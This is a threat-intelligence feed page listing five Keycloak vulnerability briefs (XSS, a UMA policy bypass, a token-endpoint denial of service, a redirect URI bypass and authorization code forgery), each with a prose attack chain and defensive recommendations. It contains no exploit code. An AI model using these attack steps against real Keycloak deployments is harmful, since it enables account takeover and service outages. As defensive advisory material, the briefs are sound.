https://feed.craftedsignal.io/tags/keycloak/Trending threats, MITRE ATT&CK coverage, and detection metadata — refreshed continuously.Hugoenhello@craftedsignal.iohello@craftedsignal.ioWed, 15 Apr 2026 07:33:56 +0000https://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/Wed, 15 Apr 2026 07:33:56 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-keycloak-xss/An authenticated remote attacker can exploit a vulnerability in Keycloak to perform a Cross-Site Scripting attack, potentially leading to unauthorized access and data compromise.A Cross-Site Scripting (XSS) vulnerability exists within Keycloak, a widely-used open-source identity and access management solution. This vulnerability allows a remote, authenticated attacker to inject malicious scripts into web pages viewed by other users. The attacker must possess valid credentials to initially access the vulnerable Keycloak instance. While the specific version affected is not provided in this advisory, it’s crucial for organizations using Keycloak to investigate and apply necessary patches or mitigations. The impact of successful exploitation ranges from defacement to sensitive data theft and account compromise. Defenders should prioritize patching Keycloak installations and implementing input validation to mitigate this risk.

Attack Chain

1. Attacker authenticates to the Keycloak instance with valid credentials.
2. Attacker identifies a vulnerable input field or parameter within the Keycloak application (e.g., user profile, group name, etc.).
3. Attacker crafts a malicious payload containing JavaScript code.
4. Attacker injects the malicious payload into the vulnerable input field.
5. The Keycloak application stores the malicious payload without proper sanitization.
6. A victim user (e.g., another authenticated user or an administrator) accesses the page containing the injected payload.
7. The victim’s browser executes the malicious JavaScript code.
8. The attacker can then steal cookies, redirect the user to a malicious site, or perform other actions on behalf of the victim.

Impact

Successful exploitation of this XSS vulnerability can lead to several negative consequences. An attacker could potentially steal session cookies, allowing them to impersonate other users, including administrators. This could grant them unauthorized access to sensitive data, configuration settings, and management functions. Furthermore, the attacker could deface the Keycloak interface, inject phishing scams, or redirect users to malicious websites. The number of victims depends on the number of users accessing the page with the injected XSS payload.

Recommendation

• Implement input validation and output encoding to prevent XSS attacks within Keycloak.
• Review Keycloak access logs for suspicious activity related to user profiles and injected scripts.
• Deploy the Sigma rule to detect possible XSS attempts in Keycloak logs.

]]>mediumadvisorykeycloakxsscross-site scriptingcloudhttps://feed.craftedsignal.io/briefs/2026-04-keycloak-uma-bypass/Thu, 02 Apr 2026 13:16:27 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-keycloak-uma-bypass/CVE-2026-4636 describes a vulnerability in Keycloak where an authenticated user with the uma_protection role can bypass User-Managed Access (UMA) policy validation, leading to unauthorized access to victim-owned resources.A vulnerability, identified as CVE-2026-4636, has been discovered in Keycloak, a popular open-source identity and access management solution. This flaw allows an authenticated user who possesses the uma_protection role to bypass User-Managed Access (UMA) policy validation. By exploiting this vulnerability, an attacker can manipulate policy creation requests to include resource identifiers that belong to other users. This circumvents the intended access controls and enables the attacker to gain unauthorized permissions to resources owned by victims. The scope of the attack is limited to Keycloak instances where UMA is enabled and users have the uma_protection role. This can lead to significant data breaches and unauthorized actions performed under the guise of legitimate users.

Attack Chain

1. An attacker authenticates to Keycloak with an account that has the uma_protection role.
2. The attacker initiates a request to create a new UMA policy.
3. The attacker crafts the policy creation request to include resource identifiers that belong to other users. This is done even though the URL path in the request specifies a resource owned by the attacker.
4. The UMA policy validation mechanism fails to properly verify the ownership of the included resource identifiers.
5. Keycloak creates the UMA policy, granting the attacker unauthorized permissions to the victim-owned resources.
6. The attacker obtains a Requesting Party Token (RPT) for the victim’s resources using the newly created policy.
7. The attacker uses the RPT to access the victim’s resources, potentially accessing sensitive information.
8. The attacker performs unauthorized actions on the victim’s resources, leveraging the gained permissions.

Impact

Successful exploitation of CVE-2026-4636 allows an attacker to gain unauthorized access to resources managed by Keycloak. This can lead to the exposure of sensitive data, such as personal information, financial records, or confidential business documents. The number of affected users depends on the scope of the attacker’s access and the number of resources they can compromise. The impact could range from individual account compromise to widespread data breaches affecting entire organizations relying on Keycloak for access control.

Recommendation

• Apply the patch or upgrade to a version of Keycloak that resolves CVE-2026-4636 as soon as it becomes available.
• Monitor Keycloak logs for suspicious UMA policy creation requests that include resource identifiers not owned by the requesting user. Create a Sigma rule based on webserver logs and filter for POST requests on /auth/realms/<realm>/authz/protection/uma-policy/ with suspicious resource IDs in the body.
• Implement additional access controls and validation mechanisms to verify the ownership of resource identifiers during UMA policy creation.
• Review existing UMA policies to identify and remove any policies that may have been created maliciously using this vulnerability.

]]>highadvisorykeycloakumapolicy-bypassprivilege-escalationhttps://feed.craftedsignal.io/briefs/2026-04-keycloak-dos/Thu, 02 Apr 2026 13:16:27 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-keycloak-dos/An unauthenticated attacker can cause a denial-of-service on Keycloak servers by sending a crafted POST request to the OIDC token endpoint with an excessively long scope parameter, leading to high resource consumption.CVE-2026-4634 describes a denial-of-service vulnerability affecting Keycloak servers. This vulnerability allows an unauthenticated attacker to exhaust server resources by sending a specially crafted HTTP POST request to the OpenID Connect (OIDC) token endpoint. The malicious request includes an excessively long scope parameter, which forces the Keycloak server to consume significant processing time and memory. This can result in prolonged processing times for legitimate requests and ultimately a denial of service for all users of the affected Keycloak instance. The vulnerability was reported on April 2, 2026, and affects unpatched versions of Keycloak. Defenders should prioritize patching and consider implementing rate limiting to mitigate the impact of this vulnerability.

Attack Chain

1. The attacker identifies a vulnerable Keycloak instance.
2. The attacker crafts an HTTP POST request targeted at the OIDC token endpoint (e.g., /auth/realms/{realm-name}/protocol/openid-connect/token).
3. The attacker includes a scope parameter in the POST request.
4. The attacker sets the value of the scope parameter to an extremely long string, causing the Keycloak server to allocate excessive resources when processing it.
5. The attacker sends the malicious POST request to the Keycloak server.
6. The Keycloak server attempts to process the excessively long scope parameter, consuming CPU and memory resources.
7. Repeated requests from the attacker further exhaust server resources.
8. The Keycloak server becomes unresponsive, leading to a denial of service for legitimate users.

Impact

Successful exploitation of CVE-2026-4634 results in a denial-of-service condition, rendering the Keycloak server unavailable. This impacts all applications and services relying on Keycloak for authentication and authorization. The number of affected users depends on the size and criticality of the Keycloak deployment. Organizations in any sector using Keycloak are potentially vulnerable. Unavailability can disrupt business operations, impacting productivity and revenue.

Recommendation

• Apply the security patch released by Red Hat/Keycloak to address CVE-2026-4634 to eliminate the vulnerability.
• Implement rate limiting on the OIDC token endpoint to restrict the number of requests from a single IP address within a given timeframe.
• Monitor web server logs for suspicious POST requests to the OIDC token endpoint with unusually long scope parameters to detect potential exploitation attempts and deploy the Sigma rule Detect Suspiciously Long Scope Parameter.
• Consider deploying a web application firewall (WAF) rule to block requests with excessively long scope parameters.

]]>highadvisorycve-2026-4634denial-of-servicekeycloakhttps://feed.craftedsignal.io/briefs/2026-04-keycloak-redirect-bypass/Thu, 02 Apr 2026 13:16:26 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-keycloak-redirect-bypass/CVE-2026-3872 is a vulnerability in Keycloak that allows an attacker controlling a path on the same web server to bypass URI redirect validation using a wildcard, potentially leading to access token theft and information disclosure.CVE-2026-3872 is a security flaw found in Keycloak, a popular open-source identity and access management solution. This vulnerability allows a malicious actor who has control over another path on the same web server hosting Keycloak to circumvent the allowed path restrictions in redirect URIs that use a wildcard. By exploiting this weakness, an attacker can potentially redirect a user to a malicious site after authentication, intercept the access token, and gain unauthorized access to the user’s resources. The vulnerability could lead to the disclosure of sensitive information and potentially compromise user accounts. This was published on April 2, 2026, and has a CVSS v3.1 score of 7.3.

Attack Chain

1. The attacker gains control of a path on the same web server hosting the Keycloak instance. This could be achieved through various means, such as exploiting a separate vulnerability in another application hosted on the server.
2. The attacker crafts a malicious URL that exploits the wildcard redirect URI validation flaw in Keycloak. The crafted URL includes a redirect URI that bypasses the intended restrictions.
3. A legitimate user initiates an authentication request to Keycloak, potentially through a vulnerable application relying on Keycloak for authentication.
4. Keycloak processes the authentication request and, due to the vulnerability, accepts the attacker’s crafted redirect URI as valid.
5. Keycloak redirects the user to the attacker-controlled URL after successful authentication.
6. The attacker’s server captures the access token from the redirect URI.
7. The attacker uses the stolen access token to impersonate the user and access protected resources.
8. The attacker gains unauthorized access to sensitive information or performs actions on behalf of the user, leading to information disclosure or other malicious activities.

Impact

Successful exploitation of CVE-2026-3872 can lead to the theft of access tokens, enabling unauthorized access to user accounts and sensitive data. This could result in the compromise of user privacy, financial loss, or reputational damage for organizations relying on affected Keycloak instances. The impact is significant because Keycloak is used across various sectors to secure web applications and APIs.

Recommendation

• Apply the security patches or updates provided by Red Hat for Keycloak to address CVE-2026-3872. Refer to the Red Hat advisory linked in the references for specific instructions.
• Deploy the provided Sigma rule to detect exploitation attempts of CVE-2026-3872 based on suspicious redirect URIs in web server logs.
• Review and harden the configuration of redirect URIs in Keycloak, avoiding the use of wildcards where possible and implementing stricter validation rules.
• Monitor web server logs for suspicious activity related to redirect URIs, looking for unusual patterns or attempts to access unauthorized resources.

]]>mediumadvisorykeycloakredirect-uri-bypasscve-2026-3872authenticationauthorizationhttps://feed.craftedsignal.io/briefs/2026-04-keycloak-privesc/Thu, 02 Apr 2026 13:16:26 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-keycloak-privesc/An unauthenticated attacker can exploit CVE-2026-4282 in Keycloak's SingleUseObjectProvider to forge authorization codes, leading to privilege escalation and the creation of admin-capable access tokens.CVE-2026-4282 identifies a critical vulnerability within the Keycloak authentication server, specifically affecting the SingleUseObjectProvider. This component, responsible for managing single-use key-value pairs, suffers from a lack of sufficient type and namespace isolation. The absence of proper isolation mechanisms allows a remote, unauthenticated attacker to manipulate the system by forging authorization codes. Successful exploitation allows for the creation of access tokens with administrative privileges. The vulnerability was published on April 2, 2026.

Attack Chain

1. The attacker sends a crafted request to the Keycloak server to initiate the authorization flow.
2. The attacker leverages the lack of type and namespace isolation in the SingleUseObjectProvider.
3. The attacker forges a valid authorization code using the vulnerability.
4. The attacker presents the forged authorization code to the token endpoint.
5. Keycloak validates the forged code due to the flawed SingleUseObjectProvider logic.
6. The attacker receives an access token with elevated (admin) privileges.
7. The attacker uses the admin-capable access token to perform administrative actions.
8. The attacker gains full control over Keycloak resources and user data.

Impact

Successful exploitation of CVE-2026-4282 allows a remote attacker to gain full administrative control over a Keycloak instance. This can lead to the compromise of all applications and services relying on Keycloak for authentication and authorization. The impact includes data breaches, account takeovers, and the potential for widespread service disruption. Given Keycloak’s prevalence in securing web applications and APIs, the vulnerability poses a significant risk to organizations using affected versions.

Recommendation

• Apply the patch or upgrade to a version of Keycloak that resolves CVE-2026-4282 as soon as it becomes available from Red Hat.
• Monitor Keycloak logs (webserver category, linux product) for suspicious requests to the authorization and token endpoints indicative of authorization code forging attempts.
• Implement stricter input validation and sanitization on the authorization code parameter to mitigate the vulnerability.

]]>highadvisorykeycloakprivilege-escalationauthorization